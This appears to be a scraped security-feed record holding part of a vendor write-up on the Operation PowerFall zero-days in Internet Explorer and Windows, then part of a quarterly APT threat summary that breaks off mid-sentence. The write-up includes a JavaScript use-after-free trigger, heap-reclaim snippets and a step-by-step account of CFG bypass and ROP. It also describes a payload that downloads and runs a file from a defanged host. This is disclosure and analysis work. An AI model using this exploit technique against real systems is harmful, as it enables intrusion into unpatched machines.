unknown full chain that consisted of two zero-day exploits: a remote code execution exploit for Internet Explorer and an elevation of privilege exploit for Windows. Unlike a previous full chain that we discovered, used in Operation WizardOpium, the new full chain targeted the latest builds of Windows 10, and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build [18363](<https://docs.microsoft.com/en-us/windows/release-information/>) x64.\n\nOn June 8, 2020, we reported our discoveries to Microsoft, and the company confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for vulnerability [CVE-2020-0986](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0986>) that was used in the zero-day elevation of privilege exploit, but before our discovery, the exploitability of this vulnerability was considered less likely. The patch for CVE-2020-0986 was released on June 9, 2020.\n\nMicrosoft assigned [CVE-2020-1380](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1380>) to a use-after-free vulnerability in JScript and the patch was released on August 11, 2020. \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/12070837/CVE-2020-1380_list.png>)\n\nWe are calling this and related attacks 'Operation PowerFall'. Currently, we are unable to establish a definitive link with any known threat actors, but due to similarities with previously discovered exploits, we believe that [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>) may be behind this attack. Kaspersky products detect Operation PowerFall attacks with verdict PDM:Exploit.Win32.Generic.\n\n## Internet Explorer 11 remote code execution exploit\n\nThe most recent zero-day exploits for Internet Explorer discovered in the wild relied on the vulnerabilities CVE-2020-0674, CVE-2019-1429, CVE-2019-0676 and CVE-2018-8653 in the legacy JavaScript engine jscript.dll. In contrast, CVE-2020-1380 is a vulnerability in jscript9.dll, which has been used by default starting with Internet Explorer 9, and because of this, the [mitigation steps](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001>) recommended by Microsoft (restricting the usage of jscript.dll) cannot protect against this particular vulnerability.\n\nCVE-2020-1380 is a Use-After-Free vulnerability that is caused by JIT optimization and the lack of necessary checks in just-in-time compiled code. A proof-of-concept (PoC) that triggers vulnerability is demonstrated below:\n \n \n function func(O, A, F, O2) {\n arguments.push = Array.prototype.push;\n O = 1;\n arguments.length = 0;\n arguments.push(O2);\n if (F == 1) {\n O = 2;\n }\n \n // execute abp.valueOf() and write by dangling pointer\n A[5] = O;\n };\n \n // prepare objects\n var an = new ArrayBuffer(0x8c);\n var fa = new Float32Array(an);\n \n // compile func\n func(1, fa, 1, {});\n for (var i = 0; i < 0x10000; i++) {\n func(1, fa, 1, 1);\n }\n \n var abp = {};\n abp.valueOf = function() {\n \n // free \n worker = new Worker('worker.js');\n worker.postMessage(an, [an]);\n worker.terminate();\n worker = null;\n \n // sleep\n var start = Date.now();\n while (Date.now() - start < 200) {}\n \n // TODO: reclaim freed memory\n \n return 0\n };\n \n try {\n func(1, fa, 0, abp);\n } catch (e) {\n reload()\n }\n\nTo understand this vulnerability, let us take a look at how _func()_ is executed. It is important to understand what value is set to _A[5]_. According to the code, it should be an _O_ argument. At function start, the _O_ argument is re-assigned to 1, but then the function arguments length is set to 0. This operation does not clear function arguments (as it would normally do with regular array) but allows to put argument _O2 _into the arguments list at index zero using Array.prototype.push, meaning _O_ = _O2_ now. Besides that, if the argument _F _is equal to 1, then _O_ will be re-assigned once again, but to the integer number 2. It means that depending on the value of the _F _argument, the _O _argument is equal to either the value of the _O2 _argument or the integer number 2. The argument _A_ is a typed array of 32-bit floating point numbers, and before assigning a value to index 5 of the array, this value should be converted to a float. Converting an integer to a float is a relatively simple task, but it become less straightforward when an object is converted to a float number. The exploit uses the object _abp_ with an overridden _valueOf()_ method. This method is executed when the object is converted to a float, but inside the method there is code that frees ArrayBuffer, which is viewed by Float32Array and where the returned value will be set. To prevent the value from being stored in the memory of the freed object, the JavaScript engine needs to check the status of the object before storing the value in it. To convert and store the float value safely, JScript9.dll uses the function _Js::TypedArray<float,0>::BaseTypedDirectSetItem()_. You can see decompiled code of this function below:\n \n \n int Js::TypedArray<float,0>::BaseTypedDirectSetItem(Js::TypedArray<float,0> *this, unsigned int index, void *object, int reserved)\n {\n Js::JavascriptConversion::ToNumber(object, this->type->library->context);\n if ( LOBYTE(this->view[0]->unusable) )\n Js::JavascriptError::ThrowTypeError(this->type->library->context, 0x800A15E4, 0);\n if ( index < this->count )\n {\n *(float *)&this->buffer[4 * index] = Js::JavascriptConversion::ToNumber(\n object,\n this->type->library->context);\n }\n return 1;\n }\n \n double Js::JavascriptConversion::ToNumber(void *object, struct Js::ScriptContext *context)\n {\n if ( (unsigned char)object & 1 )\n return (double)((int)object >> 1);\n if ( *(void **)object == VirtualTableInfo<Js::JavascriptNumber>::Address[0] )\n return *((double *)object + 1);\n return Js::JavascriptConversion::ToNumber_Full(object, context);\n }\n\nThis function checks the _view[0]->unusable_ and _count _fields of the typed float array and when ArrayBuffer is freed during execution of the _valueOf()_ method, both of these checks will fail because _view[0]->unusable _will be set to 1 and _count _will be set to 0 during the first call to _Js::JavascriptConversion::ToNumber()_. The problem lies in the fact that the function _Js::TypedArray<float,0>::BaseTypedDirectSetItem()_ is used only in interpretation mode.\n\nWhen the function _func() _is compiled just in time, the JavaScript engine will use the vulnerable code below.\n \n \n if ( !((unsigned char)floatArray & 1) && *(void *)floatArray == &Js::TypedArray<float,0>::vftable )\n {\n if ( floatArray->count > index )\n {\n buffer = floatArray->buffer + 4*index;\n if ( object & 1 )\n {\n *(float *)buffer = (double)(object >> 1);\n }\n else\n {\n if ( *(void *)object != &Js::JavascriptNumber::vftable )\n {\n Js::JavascriptConversion::ToFloat_Helper(object, (float *)buffer, context);\n }\n else\n {\n *(float *)buffer = *(double *)(object->value);\n }\n }\n }\n }\n\nAnd here is the code of the _Js::JavascriptConversion::ToFloat_Helper()_ function.\n \n \n void Js::JavascriptConversion::ToFloat_Helper(void *object, float *buffer, struct Js::ScriptContext *context)\n {\n *buffer = Js::JavascriptConversion::ToNumber_Full(object, context);\n }\n\nAs you can see, unlike in interpretation mode, in just-in-time compiled code, the life cycle of ArrayBuffer is not checked, and its memory can be freed and then reclaimed during a call to the _valueOf() _function. Additionally, the attacker can control at what index the returned value is written. However, in the case when "arguments.length = 0;"and "arguments.push(O2);" are replaced in PoC with "arguments[0] = O2;" then _Js::JavascriptConversion::ToFloat_Helper() _will not trigger the bug because implicit calls will be disabled and it will not perform a call to the _valueOf()_ function.\n\nTo ensure that the function _func()_ is compiled just in time, the exploit executes this function 0x10000 times, performing a harmless conversion of the integer, and only after that _func()_ is executed once more, triggering the bug. To free ArrayBuffer, the exploit uses a common technique abusing the Web Workers API. The function _postMessage()_ can be used to serialize objects to messages and send them to the worker. As a side effect, transferred objects are freed and become unusable in the current script context. When ArrayBuffer is freed, the exploit triggers garbage collection via code that simulates the use of the _Sleep()_ function: it is a while loop that checks for the time lapse between _Date.now() _and the previously stored value. After that, the exploit reclaims the memory with integer arrays.\n \n \n for (var i = 0; i < T.length; i += 1) {\n T[i] = new Array((0x1000 - 0x20) / 4);\n T[i][0] = 0x666; // item needs to be set to allocate LargeHeapBucket\n }\n\nWhen a large number of arrays is created, Internet Explorer allocates new LargeHeapBlock objects, which are used by IE's custom heap implementation. The LargeHeapBlock objects will store the addresses of buffers allocated for the arrays. If the expected memory layout is achieved successfully, the vulnerability will overwrite the value at the offset 0x14 of LargeHeapBlock with 0, which happens to be the allocated block count.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/03155654/sl_ie11_and_windows_01.png>)\n\n**_LargeHeapBlock structure for jscript9.dll x86_**\n\n_ _After that, the exploit allocates a huge number of arrays and sets them to another array that was prepared at the initial stage of the exploitation. Then this array is set to null, and the exploit makes a call to the _CollectGarbage()_ function. This results in defragmentation of the heap, and the modified LargeHeapBlock will be freed along with its associated array buffers. At this stage, the exploit creates a large amount of integer arrays in hopes of reclaiming the previously freed array buffers. The newly created arrays have a magic value set at index zero, and this value is checked through a dangling pointer to the previously freed array to detect if the exploitation was successful.\n \n \n for (var i = 0; i < K.length; i += 1) {\n K[i] = new Array((0x1000 - 0x20) / 4);\n K[i][0] = 0x888; // store magic\n }\n \n for (var i = 0; i < T.length; i += 1) {\n if (T[i][0] == 0x888) { // find array accessible through dangling pointer\n R = T[i];\n break;\n }\n }\n\nAs a result, the exploit creates two different JavascriptNativeIntArray objects with buffers pointing to the same location. This makes it possible to retrieve the addresses of the objects and even create new malformed objects. The exploit takes advantage of these primitives to create a malformed DataView object and get read/write access to the whole address space of the process.\n\nAfter the building of the arbitrary read/write primitives, it is time to bypass Control Flow Guard (CFG) and get code execution. The exploit uses the Array's vftable pointer to get the module base address of jscript9.dll. From there, it parses the PE header of jscript9.dll to get the address of the Import Directory Table and resolves the base addresses of the other modules. The goal here is to find the address of the function _VirtualProtect()_, which will be used to make the shellcode executable. After that, the exploit searches for two signatures in jscript9.dll. Those signatures correspond to the address of the Unicode string "split" and the address of the function: _JsUtil::DoublyLinkedListElement<ThreadContext>::LinkToBeginning<ThreadContext>()_. The address of the Unicode string "split" is used to get a code reference to the string and with its help, to resolve the address of the function _Js::JavascriptString::EntrySplit()_, which implements the string method _split()_. The address of the function _LinkToBeginning<ThreadContext>() _is used to obtain the address of the first ThreadContext object in the global linked list. The exploit locates the last entry in the linked list and uses it to get the location of the stack for the thread responsible for the execution of the script. After that comes the final stage. The exploit executes the _split() _method and an object with an overridden _valueOf()_ method is provided as a _limit _argument. When the overridden _valueOf()_ method is executed during the execution of the function _Js::JavascriptString::EntrySplit()_, the exploit will search the thread's stack to find the return address, place the shellcode in a prepared buffer, obtain its address, and finally build a return-oriented programming (ROP) chain to execute the shellcode by overwriting the return address of the function.\n\n## Next stage\n\nThe shellcode is a reflective DLL loader for the portable executable (PE) module that is appended to the shellcode. The module is very small in size, and the whole functionality is located inside a single function. It creates a file within a temporary folder with the name ok.exe and writes to it the contents of another executable that is present in the remote code execution exploit. After that, ok.exe is executed.\n\nThe ok.exe executable contains is an elevation of privilege exploit for the arbitrary pointer dereference vulnerability CVE-2020-0986 in the GDI Print / Print Spooler API. Initially, this vulnerability was reported to Microsoft by an anonymous user working with Trend Micro's Zero Day Initiative back in December 2019. Due to the patch not being released for six months since the original report, ZDI posted a public [advisory](<https://www.zerodayinitiative.com/advisories/ZDI-20-663/>) for this vulnerability as a zero-day on May 19, 2020. The next day, the vulnerability was exploited in the previously mentioned attack.\n\nThe vulnerability makes it possible to read and write the arbitrary memory of the splwow64.exe process using interprocess communication, and use it to achieve code execution in the splwow64.exe process, bypassing the CFG and [EncodePointer](<https://docs.microsoft.com/en-us/previous-versions/bb432254\\(v=vs.85\\)>) protection. The exploit comes with two executables embedded in its resources. The first executable is written to disk as CreateDC.exe and is used to create a device context (DC), which is required for exploitation. The second executable has the name PoPc.dll and if the exploitation is successful, it is executed by splwow64.exe with a medium integrity level. We will provide further details on CVE-2020-0986 and its exploitation in a follow-up post.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/03155838/sl_ie11_and_windows_02.png>)\n\n**_Execution of a malicious PowerShell command from splwow64.exe_**\n\nThe main functionality of PoPc.dll is also located inside a single function. It executes an encoded PowerShell command that proceeds to download a file from www[.]static-cdn1[.]com/update.zip, saves it to the temporary folder as upgrader.exe and executes it. We were unable to analyze upgrader.exe because Kaspersky technologies prevented the attack before the executable was downloaded.\n\n## IoCs\n\n[www[.]static-cdn1[.]com/update.zip](<https://opentip.kaspersky.com/www.static-cdn1.com%2Fupdate.zip/>) \n[B06F1F2D3C016D13307BC7CE47C90594](<https://opentip.kaspersky.com/B06F1F2D3C016D13307BC7CE47C90594/>) \n[D02632CFFC18194107CC5BF76AECA7E87E9082FED64A535722AD4502A4D51199](<https://opentip.kaspersky.com/D02632CFFC18194107CC5BF76AECA7E87E9082FED64A535722AD4502A4D51199/>) \n[5877EAECA1FE8A3A15D6C8C5D7FA240B](<https://opentip.kaspersky.com/5877EAECA1FE8A3A15D6C8C5D7FA240B/>) \n[7577E42177ED7FC811DE4BC854EC226EB037F797C3B114E163940A86FD8B078B](<https://opentip.kaspersky.com/7577E42177ED7FC811DE4BC854EC226EB037F797C3B114E163940A86FD8B078B/>) \n[B72731B699922608FF3844CCC8FC36B4](<https://opentip.kaspersky.com/B72731B699922608FF3844CCC8FC36B4/>) \n[7765F836D2D049127A25376165B1AC43CD109D8B9D8C5396B8DA91ADC61ECCB1](<https://opentip.kaspersky.com/7765F836D2D049127A25376165B1AC43CD109D8B9D8C5396B8DA91ADC61ECCB1/>) \n[E01254D7AF1D044E555032E1F78FF38F](<https://opentip.kaspersky.com/E01254D7AF1D044E555032E1F78FF38F/>) \n[81D07CAE45CAF27CBB9A1717B08B3AB358B647397F08A6F9C7652D00DBF2AE24](<https://opentip.kaspersky.com/81D07CAE45CAF27CBB9A1717B08B3AB358B647397F08A6F9C7652D00DBF2AE24/>)", "cvss3": {}, "published": "2020-08-12T07:00:28", "type": "securelist", "title": "Internet Explorer and Windows zero-day exploits used in Operation PowerFall", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-8653", "CVE-2019-0676", "CVE-2019-1429", "CVE-2020-0674", "CVE-2020-0986", "CVE-2020-1380"], "modified": "2020-08-12T07:00:28", "id": "SECURELIST:6E5BCE8A736D28A7E168E1CD5131CE3D", "href": "https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-04T10:41:58", "description": "\n\nFor more than four years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q2 2021.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nInvestigating the recent Microsoft Exchange vulnerabilities we and our colleagues from AMR found an attacker deploying a previously unknown backdoor, "FourteenHi", in a campaign that we dubbed ExCone, active since mid-March. During our investigation we revealed multiple tools and variants of FourteenHi, configured with infrastructure that FireEye reported as being related to the UNC2643 activity cluster. Moreover, we saw ShadowPad detections coincide with FourteenHi variant infections, possibly hinting at a shared operator between these two malware families.\n\nFourteenHi abuses the popular VLC media player to execute its loader. It is capable of performing basic backdoor functions. Further investigation also revealed scripts used by the actor to gain situational awareness post-exploitation, as well as previous use of the infrastructure to operate Cobalt Strike Beacon.\n\nAlthough we couldn't directly attribute this activity to any known threat actor, we found older, highly similar 64-bit samples of the backdoor used in close proximity with ShadowPad malware, mostly known for its operations involving supply-chain attacks as an infection vector. Notably, we also found one C2 IP used in a 64-bit sample reportedly used in the UNC2643 activity set, associated with the HAFNIUM threat actor, also using Cobalt Strike, DLL side-loading and exploiting the same Exchange vulnerabilities.\n\n## Russian-speaking activity\n\nOn May 27 and 28, details regarding an ongoing email campaign against diplomatic entities throughout Europe and North America were released by Volexity and Microsoft. These attacks were attributed to Nobelium and APT29 by Microsoft and Volexity respectively. While we were able to verify the malware and possible targeting for this cluster of activity, we haven't been able to make a definitive assessment at this time about which threat actor is responsible, although we found ties to Kazuar. We have designated it as a new threat actor and named it "HotCousin". The attacks began with a spear-phishing email which led to an ISO file container being stored on disk and mounted. From here, the victim was presented with a LNK file made to look like a folder within an Explorer window. If the victim double clicked on it, the LNK then executed a loader written in .NET referred to as BoomBox, or a DLL. The execution chain ultimately ended with a Cobalt Strike beacon payload being loaded into memory. According to public blogs, targeting was widespread but focused primarily on diplomatic entities throughout Europe and North America: based on the content of the lure documents bundled with the malware, this assessment appears to be accurate. This cluster of activity was conducted methodically beginning in January with selective targeting and slow operational pace, then ramping up and ending in May. There are indications of previous activity from this threat actor dating back to at least October 2020, based on other Cobalt Strike payloads and loaders bearing similar toolmarks.\n\n## Chinese-speaking activity\n\nWhile investigating a recent rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. This cluster stood out because it used a formerly unknown Windows kernel mode rootkit and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers. The former is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open source project named "Cheat Engine" to bypass the Windows Driver Signature Enforcement mechanism. We were able to determine that this toolset had been in use from as early as July 2020; and that the threat actor was mostly focused on Southeast Asian targets, including several governmental entities and telecoms companies. Since this was a long-standing operation, with high-profile victims, an advanced toolset and no affinity to a known threat actor, we decided to name the underlying cluster "GhostEmperor".\n\nAPT31 (aka ZIRCONIUM) is a Chinese-speaking intrusion set. This threat actor set up an ORB (Operational Relay Boxes) infrastructure, composed of several compromised SOHO routers, to target entities based in Europe (and perhaps elsewhere). As of the publication of our report in May, we had seen these ORBs used to relay Cobalt Strike communications and for anonymization proxying purposes. It is likely that APT31 uses them for other implants and ends as well (for example, exploit or malware staging). Most of the infrastructure put in place by APT31 comprises compromised Pakedge routers (RK1, RE1 and RE2). This little-known constructor specializes in small enterprise routers and network devices. So far, we don't know which specific vulnerability has been exploited by the intrusion set to compromise the routers. Nor do we currently possess telemetry that would provide further visibility into this campaign. We will, of course, continue to track these activities.\n\nFollowing our previous report on EdwardsPheasant, DomainTools and BitDefender published articles about malicious activities against targets in Southeast Asia which we believe, with medium to high confidence, are parts of EdwardsPheasant campaigns. While tracking the activities of this threat actor, analyzing samples discovered or provided by third parties, and investigating from public IoCs, we discovered an updated DropPhone implant, an additional implant loaded by FoundCore's shellcode, several possible new infection documents and malicious domain names, as well as additional targets. While we do not believe we have a complete picture of this set of activities yet, our report this quarter marks a significant step further in understanding its extent.\n\nA Chinese-speaking APT compromised a certificate authority in Mongolia and replaced digital certificate management client software with a malicious downloader in February. We are tracking this group as BountyGlad. Related infrastructure was identified and used in multiple other incidents: interesting related activity included server-side attacks on WebSphere and WebLogic services in Hong Kong; and on the client-side, Trojanized Flash Player installers. The group demonstrated an increase in strategic sophistication with this supply-chain attack. While replacing a legitimate installer on a high value website like a certificate authority requires a medium level of skill and coordination, the technical sophistication is not on par with ShadowHammer. And while the group deploys fairly interesting, but simplistic, steganography to cloak its shellcode, we think it was probably generated with code that has been publicly available for years. Previous activity also connected with this group relied heavily on spear-phishing and Cobalt Strike throughout 2020. Some activity involved PowerShell commands and loader variants different from the downloaders presented in our recent report. In addition to spear-phishing, the group appears to rely on publicly available exploits to penetrate unpatched target systems. They use implants and C2 (Command and Control) code that are a mix of both publicly available and privately shared across multiple Chinese-speaking APTs. We are able to connect infrastructure across multiple incidents. Some of those were focused on Western targets in 2020. Some of the infrastructure listed in an FBI Flash alert published in May 2020, targeting US organizations conducting COVID-19 research, was also used by BountyGlad.\n\nWhile investigating users infected with the TPCon backdoor, previously discussed in a private report, we detected loaders which are part of a new multi-plugin malware framework that we named "QSC", which allows attackers to load and run plugins in-memory. We attribute the use of this framework to Chinese-speaking groups, based on some overlaps in victimology and infrastructure with other known tools used by these groups. We have so far observed the malware loading a Command shell and File Manager plugins in-memory. We believe the framework has been used in the wild since April 2020, based on the compilation timestamp of the oldest sample found. However, our telemetry suggests that the framework is still in use: the latest activity we detected was in March this year.\n\nEarlier this month, Rostelecom Solar and NCIRCC issued a joint public report describing a series of attacks against networks of government entities in Russia. The report described a formerly unknown actor leveraging an infection chain that leads to the deployment of two implants - WebDav-O and Mail-O. Those, in conjunction with other post-exploitation activity, have led to network-wide infections in the targeted organizations that resulted in exfiltration of sensitive data. We were able to trace the WebDav-O implant's activity in our telemetry to at least 2018, indicating government affiliated targets based in Belarus. Based on our investigation, we were able to find additional variants of the malware and observe some of the commands executed by the attackers on the compromised machines.\n\nWe discovered a cluster of activity targeting telecom operators within a specific region. The bulk of this activity took place from May to October 2020. This activity made use of several malware families and tools; but the infrastructure, a staging directory, and in-country target profiles tie them together. The actors deployed a previously unknown passive backdoor, that we call "TPCon", as a primary implant. It was later used to perform both reconnaissance within target organizations and to deploy a post-compromise toolset made up mostly of publicly available tools. We also found other previously unknown active backdoors, that we call "evsroin", used as secondary implants. Another interesting find was a related loader (found in a staging directory) that loaded a KABA1 implant variant. KABA1 was an implant used against targets throughout the South China Sea that we attributed to the Naikon APT back in 2016. On another note, on the affected hosts we found additional multiple malware families shared by Chinese-speaking actors, such as ShadowPad and Quarian backdoors. These did not seem to be directly connected to the TPCon/evsroin incidents because the supporting infrastructure appeared to be completely separate. One of the ShadowPad samples appears to have been detected in 2020, while the others were detected well before that, in 2019. Besides the Naikon tie, we found some overlaps with previously reported IceFog and IamTheKing activities.\n\n## Middle East\n\nBlackShadow is a threat group that became known after exfiltrating sensitive documents from Shirbit, an Israeli insurance company, and demanding a ransom in exchange for not releasing the information in its possession. Since then, the group has made more headlines, breaching another company in Israel and publishing a trove of documents containing customer related information on Telegram. Following this, we found several samples of the group's unique .NET backdoor in our telemetry that were formerly unknown to us, one of which was recently detected in Saudi Arabia. By pivoting on new infrastructure indicators that we observed in those samples, we were able to find a particular C2 server that was contacted by a malicious Android implant and shows ties to the group's activity.\n\nWe previously covered a WildPressure campaign against targets in the Middle East . Keeping track of the threat actor's malware this spring, we were able to find a newer version (1.6.1) of their C++ Trojan, a corresponding VBScript variant with the same version and a completely new set of modules, including an orchestrator and three plugins. This confirms our previous assumption that there are more last-stagers besides the C++ ones, based on one of the fields in the C2 communication protocol which contains the "client" programming language. Another language used by WildPressure is Python. The PyInstaller module for Windows contains a script named "Guard". Perhaps the most interesting finding here is that this malware was developed for both Windows and macOS operating systems. In this case, the hardcoded version is 2.2.1. The coding style, overall design and C2 communication protocol is quite recognisable across all programming languages used by the attackers. The malware used by WildPressure is still under active development in terms of versions and programming languages in use. Although we could not associate WildPressure's activity with other threat actors, we did find minor similarities in the TTPs (Tactics, Techniques and Procedures) used by BlackShadow, which is also active in the same region. However, we consider that these similarities serve as minor ties and are not enough to make any attribution.\n\nWe discovered an ongoing campaign that we attribute to an actor named WIRTE, beginning in late 2019, targeting multiple sectors, focused on the Middle East. WIRTE is a lesser-known threat actor first publicly referenced in 2019, which we suspect has relations with the Gaza Cybergang threat actor group. During our hunting efforts, in February, for threat actor groups that are using VBS/VBA implants, we came across MS Excel droppers that use hidden spreadsheets and VBA macros to drop their first stage implant - a VBS script. The VBS script's main function is to collect system information and execute arbitrary code sent by the attackers. Although we recently reported on a new Muddywater first stage VBS implant used for reconnaissance and profiling activities, these intrusion sets have slightly different TTPs and wider targeting. To date, we have recorded victims focused in the Middle East and a few other countries outside this region. Despite various industries being affected, the focus was mainly towards government and diplomatic entities; however, we also noticed an unusual targeting of law firms.\n\nGoldenJackal is the name we have given to a cluster of activity, recently discovered in our telemetry, that has been active since November 2019. This intrusion set consists of a set of .NET-based implants that are intended to control victim machines and exfiltrate certain files from them, suggesting that the actor's primary motivation is espionage. Furthermore, the implants were found in a restricted set of machines associated with diplomatic entities in the Middle East. Analysis of the aforementioned malware, as well as the accompanied detection logs, portray a capable and moderately stealthy actor. This can be substantiated by the successful foothold gained by the underlying actor in the few organizations we came across, all the while keeping a low signature and ambiguous footprint.\n\n## Southeast Asia and Korean Peninsula\n\nThe ScarCruft group is a geo-political motivated APT group that usually attacks government entities, diplomats and individuals associated with North Korean affairs. Following our last report about this group, we had not seen its activities for almost a year. However, we observed that ScarCruft compromised a North Korea-related news media website in January, beginning a campaign that was active until March. The attackers utilized the same exploit chains, CVE-2020-1380 and CVE-2020-0986, also used in [Operation Powerfall](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>). Based on the exploit code and infection scheme characteristics, we suspect that Operation PowerFall has a connection with the ScarCruft group. The exploit chain contains several stages of shellcode execution, finally deploying a Windows executable payload in memory. We discovered several victims from South Korea and Singapore. Besides this watering-hole attack, this group also used Windows executable malware concealing its payload. This malware, dubbed "ATTACK-SYSTEM", also used multi-stage shellcode infection to deliver the same final payload named "BlueLight". BlueLight uses OneDrive for C2. Historically, ScarCruft malware, especially RokRat, took advantage of personal cloud servers as C2 servers, such as pCloud, Box, Dropbox, and Yandex.\n\nIn May 2020, the Criminal Investigation Bureau (CIB) of Taiwan published an announcement about an attack targeting Taiwanese legislators. Based on their information, an unknown attacker sent spear-phishing emails using a fake presidential palace email account, delivering malware we dubbed "Palwan". Palwan is malware capable of performing basic backdoor functionality as well as downloading further modules with additional capabilities. Analysing the malware, we discovered another campaign, active in parallel, targeting Nepal. We also found two more waves of attacks launched against Nepal in October 2020 and in January this year using Palwan malware variants. We suspect that the targeted sector in Nepal is similar to the one reported by the CIB of Taiwan. Investigating the infrastructure used in the Nepal campaigns, we spotted an overlap with Dropping Elephant activity. However, we don't deem this overlap sufficient to attribute this activity to the Dropping Elephant threat actor.\n\nBlueNoroff is a long-standing, financially motivated APT group that has been targeting the financial industry for years. In recent operations, the group has focused on cryptocurrency businesses. Since the publication of our research of BlueNoroff's "SnatchCrypto" campaign in 2020, the group's strategy to deliver malware has evolved. In this campaign, BlueNoroff used a malicious Word document exploiting CVE-2017-0199, a remote template injection vulnerability. The injected template contains a Visual Basic script, which is responsible for decoding the next payload from the initial Word document and injecting it into a legitimate process. The injected payload creates a persistent backdoor on the victim's machine. We observed several types of backdoor. For further surveillance of the victim, the malware operator may also deploy additional tools. BlueNoroff has notably set up fake blockchain, or cryptocurrency-related, company websites for this campaign, to lure potential victims and initiate the infection process. Numerous decoy documents were used, which contain business and nondisclosure agreements as well as business introductions. When compared to the previous SnatchCrypto campaign, the BlueNoroff group utilized a similar backdoor and PowerShell agent but changed the initial infection vector. Windows shortcut files attached to spear-phishing emails used to be the starting point for an infection: they have now been replaced by weaponized Word documents.\n\nWe have discovered [Andariel activity](<https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/>) using a revised infection scheme and custom ransomware targeting a broad spectrum of industries located in South Korea. In April, we observed a suspicious document containing a Korean file name and decoy uploaded to VirusTotal. It revealed a novel infection scheme and an unfamiliar payload. During the course of our research, Malwarebytes published a report with technical details about the same series of attacks, which attributed it to the Lazarus group. After a deep analysis we reached a different conclusion - that the Andariel group was behind these attacks. Code overlaps between the second stage payload in this campaign and previous malware from the Andariel group allowed for this attribution. Apart from the code similarity and the victimology, we found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity. The threat actor has been spreading the third stage payload since the middle of 2020 and leveraged malicious Word documents and files mimicking PDF documents as infection vectors. Notably, in addition to the final backdoor, we discovered one victim infected with custom ransomware. This ransomware adds another facet to this Andariel campaign, which also sought financial profit in a previous operation involving the compromise of ATMs.\n\nWe recently uncovered a large-scale and highly active attack in Southeast Asia coming from a threat actor we dubbed [LuminousMoth](<https://securelist.com/apt-luminousmoth/103332/>). Further analysis revealed that this malicious activity dates back to October 2020 and was still ongoing at the time we reported it in June. LuminousMoth takes advantage of DLL sideloading to download and execute a Cobalt Strike payload. However, perhaps the most interesting part of this attack is its capability to spread to other hosts by infecting USB drives. In addition to the malicious DLLs, the attackers also deployed a signed, but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate files; and an additional tool that accesses a victim's Gmail session by stealing cookies from the Chrome browser. Infrastructure ties as well as shared TTPs allude to a possible connection between LuminousMoth and the HoneyMyte threat group, which was seen targeting the same region and using similar tools in the past. Most early sightings of this activity were in Myanmar, but it now appears that the attackers are much more active in the Philippines, where the number of known attacks has grown more than tenfold. This raises the question of whether this is caused by a rapid replication through removable devices or by an unknown infection vector, such as a watering-hole focusing on the Philippines.\n\nWe recently reported SideCopy campaigns attacking the Windows platform together with Android-based implants. These implants turned out to be multiple applications working as information stealers to collect sensitive information from victims' devices, such as contact lists, SMS messages, call recordings, media and other types of data. Following up, we discovered additional malicious Android applications, some of them purporting to be known messaging apps like Signal or an adult chat platform. These newly discovered applications use the Firebase messaging service as a channel to receive commands. The operator is able to control if either Dropbox or another, hard coded server is used to exfiltrate stolen files.\n\n## Other interesting discoveries\n\nExpanding our research on the exploit targeting CVE-2021-1732, originally discovered by DBAPPSecurity Threat Intelligence Center and used by the Bitter APT group, [we discovered another possible zero-day exploit used in the Asia-Pacific (APAC) region](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>). Interestingly, the exploit was found in the wild as part of a separate framework, alongside CVE-2021-1732 as well as other previously patched exploits. We are highly confident that this framework is entirely unrelated to Bitter APT and was used by a different threat actor. Further analysis revealed that this Escalation of Privilege (EoP) exploit has potentially been used in the wild since at least November 2020. Upon discovery, we reported this new exploit to Microsoft in February. After confirmation that we were indeed dealing with a new zero-day, it received the designation CVE-2021-28310.\n\nVarious marks and artifacts left in the exploit mean that we are also highly confident that CVE-2021-1732 and CVE-2021-28310 were created by the same exploit developer that we track as "Moses". "Moses" appears to be an exploit developer who makes exploits available to several threat actors, based on other past exploits and the actors observed using them. To date, we have confirmed that at least two known threat actors have utilized exploits originally developed by Moses: Bitter APT and Dark Hotel. Based on similar marks and artifacts, as well as privately obtained information from third parties, we believe at least six vulnerabilities observed in the wild in the last two years have originated from "Moses". While the EoP exploit was discovered in the wild, we are currently unable to directly tie its usage to any known threat actor that we are currently tracking. The EoP exploit was probably chained together with other browser exploits to escape sandboxes and obtain system level privileges for further access. Unfortunately, we weren't able to capture a full exploit chain, so we don't know if the exploit is used with another browser zero-day, or coupled with exploits taking advantage of known, patched vulnerabilities.\n\nIn another, more recent investigation into the surge of attacks by APT actors against Exchange servers following the revelation of ProxyLogon and other Exchange vulnerabilities, we took note of one unique cluster of activity. It attracted our attention because the actor behind it seemed to have been active in compromising Exchange servers since at least December 2020, all the while using a toolset that we were not able to associate with any known threat group. During March, several 